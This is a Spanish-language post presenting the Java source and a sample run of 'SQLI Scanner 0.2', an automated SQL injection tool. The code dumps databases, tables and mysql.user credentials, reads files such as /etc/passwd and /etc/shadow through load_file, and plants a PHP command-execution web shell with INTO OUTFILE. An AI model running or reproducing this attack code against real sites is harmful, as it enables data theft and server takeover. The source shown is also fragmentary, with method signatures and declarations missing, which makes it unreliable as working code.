Con las siguientes opciones :
- Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostras tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
Un ejemplo de uso :
Código:
-- == SQLI Scanner 0.2 == --
[+] Page :
http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data
-- == OPTIONS == --
--== information_schema.tables ==--
[1] : Show tables
[2] : Show columns
[3] : Show DBS
[4] : Show tables with other DB
[5] : Show columns with other DB
--== mysql.user ==--
[6] : Show users
--== Others ==--
[7] : Fuzzing files with load_file
[8] : Read a file with load_file
[9] : Dump
[10] : Informacion of the server
[11] : Create a shell with into outfile
[12] : Show Log
[13] : Exit
[Option] :
10
[+] Searching informaion ...
[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off
[+] Finished
El codigo es el siguiente :
Código
// -- == -- == -- == ---- == // SQLI Scanner 0.2 || // -- == -- == -- == ---- == // (C) Doddy Hackman 2013 || // -- == -- == -- == ---- == import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { String target; installer(); target = host.nextLine(); scan(target); //schematables("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //schemacolumns("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers"); //getdbs("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //getablesbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman"); //getcolbydb("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackman","hackers"); //mysqluser("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //dumper("http://localhost/sql.php?id=-1+union+select+hackman,2,3","hackers","usuario","password"); //fuzzfiles("http://localhost/sql.php?id=-1+union+select+hackman,2,3"); //openfile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","c:/test.txt"); //intofile("http://localhost/sql.php?id=-1+union+select+hackman,2,3","C:/Archivos de programa/EasyPHP-5.3.9/www","/"); } while (true) { int op; op = host.nextInt(); if (op == 1) { schematables(urla); continuar(); } else if (op == 2) { String coler; coler = a.nextLine(); schemacolumns(urla, coler); continuar(); } else if (op == 3) { getdbs(urla); continuar(); } else if (op == 4) { String tabler; tabler = a.nextLine(); getablesbydb(urla, tabler); continuar(); } else if (op == 5) { String dber; String tablerx; dber = a.nextLine(); tablerx = a.nextLine(); getcolbydb(urla, dber, tablerx); continuar(); } else if (op == 6) { mysqluser(urla); continuar(); } else if (op == 7) { fuzzfiles(urla); continuar(); } else if (op == 8) { String ar; ar = f.nextLine(); openfile(urla, ar); continuar(); } else if (op == 9) { String a; String b; String c; a = m.nextLine(); b = n.nextLine(); c = l.nextLine(); dumper(urla, a, b, c); continuar(); } else if (op == 10) { details(urla); continuar(); } else if (op == 11) { String b; String c; b = m.nextLine(); c = n.nextLine(); intofile(urla, b, c); continuar(); } else if (op == 12) { String ruta; continuar(); } else if (op == 13) { continuar(); } else { continuar(); } } } chau.nextLine(); } if (!crear.isDirectory()) { crear.mkdirs(); } } String linea; String lugar; String lugardos; String webtest; String web1; String formandoweb; String code; linea = "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"; lugar = fpd + "/cmd.php"; lugardos = dir + "/cmd.php"; webtest = "http://" + h.getHost() + lugardos; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", linea); formandoweb = web1 + "+into+outfile+'" + lugar + "'--"; code = toma(formandoweb); code = toma(webtest); uno = Pattern.compile("Mini Shell By Doddy"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[Shell UP] : " + webtest + "\r\n"); } else { } } String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; archivo = encodehex(file); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] File Found : " + file); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } else { } } String[] archivos = {"c:/test.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", "/etc/pure-ftpd/pureftpd.pdb", "/var/log/pure-ftpd/pure-ftpd.log", "/logs/pure-ftpd.log", "/var/log/pureftpd.log", "/var/log/ftp-proxy/ftp-proxy.log", "/var/log/ftp-proxy", "/var/log/ftplog", "/etc/logrotate.d/ftp", "/etc/ftpchroot", "/etc/ftphosts", "/var/log/exim_mainlog", "/var/log/exim/mainlog", "/var/log/maillog", "/var/log/exim_paniclog", "/var/log/exim/paniclog", "/var/log/exim/rejectlog", "/var/log/exim_rejectlog"}; String archivo; String web1; String code; Pattern uno = null; Matcher dos = null; for (int count = 0; count < archivos.length; count++) { archivo = encodehex(archivos[count]); web1 = urla.replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + archivo + "),char(69,82,84,79,82,56,53,52))))"); code = toma(web1); uno = Pattern.compile("ERTOR854(.*?)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] File Found : " + archivos[count]); savefile(urla, "\r\n" + "[Source Start]" + "\r\n"); savefile(urla, dos.group(1)); savefile(urla, "\r\n" + "[Source End]" + "\r\n"); } } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))"); code = toma(web1 + "+from+" + tabla + "--"); uno = Pattern.compile("K0BRA(.*?)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Table to dump : " + tabla + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+" + tabla + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] " + col1 + " : " + dos.group(1)); savefile(urla, "[+] " + col2 + " : " + dos.group(2)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))"); code = toma(web1 + "+from+mysql.user--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Users Found : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+mysql.user+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Host : " + dos.group(1)); savefile(urla, "[+] Username : " + dos.group(2)); savefile(urla, "[+] Password : " + dos.group(3)); } } } else { } } String web1; String web2; String code; String dbf; String table; int x; Pattern uno = null; Matcher dos = null; dbf = encodehex(db); table = encodehex(tab); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] Columns Found in the Table [" + tab + "." + db + "] : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + table + "+and+table_schema=" + dbf + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; String data; int x; Pattern uno = null; Matcher dos = null; data = encodehex(db); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.tables+where+table_schema=" + data + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[DB] : " + db + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+where+table_schema=" + data + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.schemata--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] DBS Found : " + dos.group(1) + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.schemata+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] DB Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; String tablexa; int x; Pattern uno = null; Matcher dos = null; tablexa = encodehex(nombre); web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.columns+where+table_name=" + tablexa + "--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[Table] : " + nombre + "\r\n"); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.columns+where+table_name=" + tablexa + "+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Column Found : " + dos.group(1)); } } } else { } } String web1; String web2; String code; int x; Pattern uno = null; Matcher dos = null; web1 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))"); web2 = urla.replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))"); code = toma(web1 + "+from+information_schema.tables--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, ""); for (x = 0; x <= finals; x = x + 1) { code = toma(web2 + "+from+information_schema.tables+limit+" + x + ",1--"); uno = Pattern.compile("K0BRA(.*)K0BRA"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] Table Found : " + dos.group(1)); } } } else { } } String codex; String target; Pattern uno = null; Matcher dos = null; target = urla; codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { int x; String urlfinal; String otrofinal; String code; String formariny; String otroformar; String link; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; savefile(link, "\r\n" + "[Target] : " + link); savefile(link, "[Limit] : The site has " + x + " columns"); savefile(link, "[Data] : The number " + dos.group(1) + " print data"); manejo(link); } } } else { } } String concat; String code; Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "\r\n" + "[+] DB Version : " + dos.group(1)); savefile(urla, "[+] DB Name : " + dos.group(2)); savefile(urla, "[+] Username : " + dos.group(3)); } else { } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] information_schema : on"); } else { } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[+] mysqluser : on"); } else { } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { savefile(urla, "[-] load_file : on"); } else { } } String formar; formar = "logs/" + h.getHost() + ".txt"; writer.write(texto + "\r\n"); writer.close(); } String re; hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); String l; int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?